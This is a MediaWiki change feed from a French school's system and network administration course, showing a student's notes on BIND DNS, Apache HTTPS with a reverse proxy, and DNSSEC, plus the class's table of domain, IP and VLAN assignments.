ns2     IN      A       193.48.57.167&lt;br /&gt;
&lt;br /&gt;
; Enregistrements principaux&lt;br /&gt;
@       IN      A       193.48.57.167&lt;br /&gt;
@       IN      AAAA    2001:660:4401:60a0:216:3eff:fe6f:f547&lt;br /&gt;
www     IN      CNAME   msalhi.online.&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
named-checkzone msalhi.online /etc/bind/zones/db.msalhi.online&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-serveur-secondaire-solstice&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du serveur secondaire (Solstice) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type slave;&lt;br /&gt;
    file &amp;quot;/var/lib/bind/db.msalhi.online&amp;quot;;&lt;br /&gt;
    masters { 192.168.20.2; };  # IP de Moon&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Redémarrage et vérification&lt;br /&gt;
systemctl restart bind9&lt;br /&gt;
ls -la /var/lib/bind/db.msalhi.online&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-chez-le-registrar-gandi&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration chez le registrar Gandi ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+ Configuration DNS chez Gandi&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Type'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Valeur'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Description'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Nameservers&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Serveur DNS primaire&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;|&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns2.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Serveur DNS secondaire&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Glue Record 1&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| IPv6: 2001:660:4401:60a0:216:3eff:fe6f:f547&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Glue Record 2&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns2.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| IPv4: 193.48.57.167&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;sécurisation-de-site-web-par-certificat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Sécurisation de site Web par certificat ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;génération-du-csr-et-obtention-du-certificat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Génération du CSR et obtention du certificat ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Génération de la clé privée&lt;br /&gt;
openssl genrsa -out /etc/ssl/private/myserver.key 2048&lt;br /&gt;
&lt;br /&gt;
# Génération du CSR&lt;br /&gt;
openssl req -new -key /etc/ssl/private/myserver.key \&lt;br /&gt;
  -out /etc/ssl/private/server.csr&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-apache-sur-moon-https-direct-ipv6&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration Apache sur Moon (HTTPS direct IPv6) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/apache2/sites-available/msalhi-ssl.conf&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    ServerAlias www.msalhi.online&lt;br /&gt;
    Redirect permanent / https://msalhi.online/&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    ServerAlias www.msalhi.online&lt;br /&gt;
    &lt;br /&gt;
    DocumentRoot /var/www/html&lt;br /&gt;
    &lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem&lt;br /&gt;
    &lt;br /&gt;
    Header always set Strict-Transport-Security &amp;quot;max-age=63072000; includeSubDomains&amp;quot;&lt;br /&gt;
    Header always set X-Frame-Options DENY&lt;br /&gt;
    Header always set X-Content-Type-Options nosniff&lt;br /&gt;
    &lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/msalhi_ssl_error.log&lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/msalhi_ssl_access.log combined&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# Activation&lt;br /&gt;
a2enmod ssl&lt;br /&gt;
a2ensite msalhi-ssl.conf&lt;br /&gt;
systemctl restart apache2&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-proxy-inverse-sur-solstice-https-ipv4&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du proxy inverse sur Solstice (HTTPS IPv4) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/apache2/sites-available/msalhi-proxy.conf&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    Redirect permanent / https://msalhi.online/&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    &lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem&lt;br /&gt;
    &lt;br /&gt;
    SSLProxyEngine on&lt;br /&gt;
    ProxyPreserveHost On&lt;br /&gt;
    &lt;br /&gt;
    # Utilisation de l'URL avec nom de domaine comme demandé&lt;br /&gt;
    ProxyPass / https://msalhi.online/&lt;br /&gt;
    ProxyPassReverse / https://msalhi.online/&lt;br /&gt;
    &lt;br /&gt;
    SSLProxyVerify none&lt;br /&gt;
    SSLProxyCheckPeerCN off&lt;br /&gt;
    &lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/proxy_error.log&lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/proxy_access.log combined&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# Activation des modules&lt;br /&gt;
a2enmod proxy proxy_http ssl&lt;br /&gt;
a2ensite msalhi-proxy.conf&lt;br /&gt;
systemctl restart apache2&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;sécurisation-de-serveur-dns-par-dnssec&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Sécurisation de serveur DNS par DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-dnssec-automatique&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration DNSSEC automatique ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création du répertoire pour les clés&lt;br /&gt;
mkdir -p /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
&lt;br /&gt;
# Ajout dans named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;dnspol&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Politique DNSSEC dans named.conf.options&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Redémarrage et vérification&lt;br /&gt;
systemctl restart bind9&lt;br /&gt;
dig @localhost msalhi.online DNSKEY +dnssec&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;résultat-des-clés-dnssec-générées&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Résultat des clés DNSSEC générées ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;; Clés obtenues via : dig @localhost msalhi.online DNSKEY +dnssec&lt;br /&gt;
&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  256 3 13 Mi9LJ2JnnUciYfGEXoDuZ0ElzOigo+Fjxhf2I1+zxZqcn7SN1FxxGfFJ v4xNsU/YTvGgzf7ZWgWa29b+OQOSug==&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  257 3 13 QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhh HW0/c1dYroeZ9riJTyQcO859svIWRw==&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  257 3 13 Z4LE6oWmFPOb+QzklArdW7HWkH6kVrjIgrKYrJBMW3n6sMwwEG1YruHe SvmXJ9GwuFxhqtRu130iPse3wrJqyQ==&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;enregistrement-de-la-ksk-chez-gandi&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Enregistrement de la KSK chez Gandi ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+ Configuration DNSSEC chez Gandi&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Paramètre'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Valeur'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Algorithm&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| 13 (ECDSAP256SHA256)&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Flags&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| 257 (KSK)&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Public Key&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhhHW0/c1dYroeZ9riJTyQcO859svIWRw==&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Msalhi</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=11423</id>
		<title>SE4 IdO sécurité système/réseau 2025/2026</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=11423"/>
		<updated>2026-01-26T10:50:11Z</updated>

		<summary type="html">&lt;p&gt;Msalhi : /* Tableau des commutateurs virtuels */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Répartition des binômes pour les travaux pratiques &amp;quot;administration système et réseau&amp;quot; =&lt;br /&gt;
&lt;br /&gt;
Préfixe des noms de machine : &amp;lt;code&amp;gt;SE4&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Domaines Internet à louer sur [[gandi.net]]. Identifiant &amp;lt;code&amp;gt;pifou&amp;lt;/code&amp;gt;. Regardez le montant prévu sur le compte avant de louer un domaine.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elève !! Nom de domaine&lt;br /&gt;
! Nom de machine de services !! Nom de machine mandataire&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinux.lol|| SE4.CachyOS||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || c2vts.fr|| SE4.C2||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || rs7.online|| SE4.RS7||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.shop|| SE4.Elf||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI &amp;amp; Agathe HOUDUSSE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI &amp;amp; Marin GOURVEST&lt;br /&gt;
|-&lt;br /&gt;
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET &amp;amp; Thomas DELOBELLE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI &amp;amp; Yassine YAHIANI &lt;br /&gt;
|-&lt;br /&gt;
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE &amp;amp; Tom MERIEN&lt;br /&gt;
|-&lt;br /&gt;
| SE4.superman|| 193.48.57.169|| Billel Cheklat &amp;amp; Antonin Biernacki&lt;br /&gt;
|-&lt;br /&gt;
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse &amp;amp; GAUTHIER Mario Sylainx S.&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Solstice|| &amp;lt;code&amp;gt;193.48.57.167&amp;lt;/code&amp;gt;|| Mohamed Salhi &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des commutateurs virtuels =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé &lt;br /&gt;
|-&lt;br /&gt;
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24&lt;br /&gt;
|-&lt;br /&gt;
|PAYET / DELOBELLE&lt;br /&gt;
|pont_pacman&lt;br /&gt;
|192.168.10.0/24&lt;br /&gt;
|-&lt;br /&gt;
|MERIEN / VANGHELUWE&lt;br /&gt;
|pont_pere&lt;br /&gt;
|192.168.0.0/24&lt;br /&gt;
|-&lt;br /&gt;
|CHEKLAT / BIERNACKI&lt;br /&gt;
|pont_ironman&lt;br /&gt;
|192.168.69.0/24&lt;br /&gt;
|-&lt;br /&gt;
|Mohamed Salhi&lt;br /&gt;
|pont_msalhi&lt;br /&gt;
|192.168.20.0/24&lt;br /&gt;
|-&lt;br /&gt;
|GOURVEST/GHAZALI&lt;br /&gt;
|pont_diviseur&lt;br /&gt;
|192.168.67.0/24&lt;br /&gt;
|-&lt;br /&gt;
|YAHIANI / TEPELI&lt;br /&gt;
|pontclio&lt;br /&gt;
|192.168.7.0/24&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des réseaux virtuels =&lt;br /&gt;
&lt;br /&gt;
VLAN privés :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
| VLAN1 || 1&lt;br /&gt;
|-&lt;br /&gt;
| MV-PROMO || 2 &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
VLAN communs avec l'école :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
| INTERCO1 || 530 &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Schéma de câblage =&lt;br /&gt;
&lt;br /&gt;
Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.&lt;br /&gt;
&lt;br /&gt;
= Plan d'adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6 &lt;br /&gt;
|-&lt;br /&gt;
| MV-PROMO || &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; || &amp;lt;/code&amp;gt;2001:660:4401:60a0::/64&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Adresses IPv4 des éléments réseau dans VLAN1&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Elément !! Adresse &lt;br /&gt;
|-&lt;br /&gt;
| Routeur C9200-E304 || 172.27.0.1/16&lt;br /&gt;
|-&lt;br /&gt;
| Routeur C9200-E306 || 172.27.0.2/16&lt;br /&gt;
|-&lt;br /&gt;
| Borne Wi-Fi E304 || 172.27.0.3/16&lt;br /&gt;
|-&lt;br /&gt;
| Borne Wi-Fi E306 || 172.27.0.4/16&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Informations VRRP =&lt;br /&gt;
&lt;br /&gt;
Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.&lt;br /&gt;
&lt;br /&gt;
== VLAN des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Une seule instance VRRP dans le VLAN des machines virtuelles.&lt;br /&gt;
&lt;br /&gt;
Adresse IPv4 virtuelle : &amp;lt;code&amp;gt;193.48.57.162&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Routeur !! IPv4 propre &lt;br /&gt;
|-&lt;br /&gt;
| C9200 E304 || &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&lt;br /&gt;
|- &lt;br /&gt;
| C9200 E306 || &amp;lt;code&amp;gt;193.48.57.164&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== VLAN ... ==&lt;/div&gt;</summary>
		<author><name>Msalhi</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=11414</id>
		<title>SE4 IdO sécurité système/réseau 2025/2026</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=11414"/>
		<updated>2026-01-26T10:34:14Z</updated>

		<summary type="html">&lt;p&gt;Msalhi : /* Tableau des commutateurs virtuels */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Répartition des binômes pour les travaux pratiques &amp;quot;administration système et réseau&amp;quot; =&lt;br /&gt;
&lt;br /&gt;
Préfixe des noms de machine : &amp;lt;code&amp;gt;SE4&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Domaines Internet à louer sur [[gandi.net]]. Identifiant &amp;lt;code&amp;gt;pifou&amp;lt;/code&amp;gt;. Regardez le montant prévu sur le compte avant de louer un domaine.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elève !! Nom de domaine&lt;br /&gt;
! Nom de machine de services !! Nom de machine mandataire&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinux.lol|| SE4.CachyOS||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || || SE4.C2||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || || SE4.RS7||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.shop|| SE4.Elf||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI &amp;amp; Agathe HOUDUSSE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI &amp;amp; Marin GOURVEST&lt;br /&gt;
|-&lt;br /&gt;
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET &amp;amp; Thomas DELOBELLE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI &amp;amp; Yassine YAHIANI &lt;br /&gt;
|-&lt;br /&gt;
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE &amp;amp; Tom MERIEN&lt;br /&gt;
|-&lt;br /&gt;
| SE4.superman|| 193.48.57.169|| Billel Cheklat &amp;amp; Antonin Biernacki&lt;br /&gt;
|-&lt;br /&gt;
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse &amp;amp; GAUTHIER Mario Sylainx S.&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Solstice|| &amp;lt;code&amp;gt;193.48.57.167&amp;lt;/code&amp;gt;|| Mohamed Salhi &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des commutateurs virtuels =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé &lt;br /&gt;
|-&lt;br /&gt;
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24&lt;br /&gt;
|-&lt;br /&gt;
|PAYET / DELOBELLE&lt;br /&gt;
|pont_pacman&lt;br /&gt;
|192.168.10.0/24&lt;br /&gt;
|-&lt;br /&gt;
|MERIEN / VANGHELUWE&lt;br /&gt;
|pont_pere&lt;br /&gt;
|192.168.0.0/24&lt;br /&gt;
|-&lt;br /&gt;
|CHEKLAT / BIERNACKI&lt;br /&gt;
|pont_ironman&lt;br /&gt;
|192.168.69.0/24&lt;br /&gt;
|-&lt;br /&gt;
|Mohamed Salhi&lt;br /&gt;
|pont_msalhi&lt;br /&gt;
|192.168.10.0/24&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des réseaux virtuels =&lt;br /&gt;
&lt;br /&gt;
VLAN privés :&lt;br /&gt;
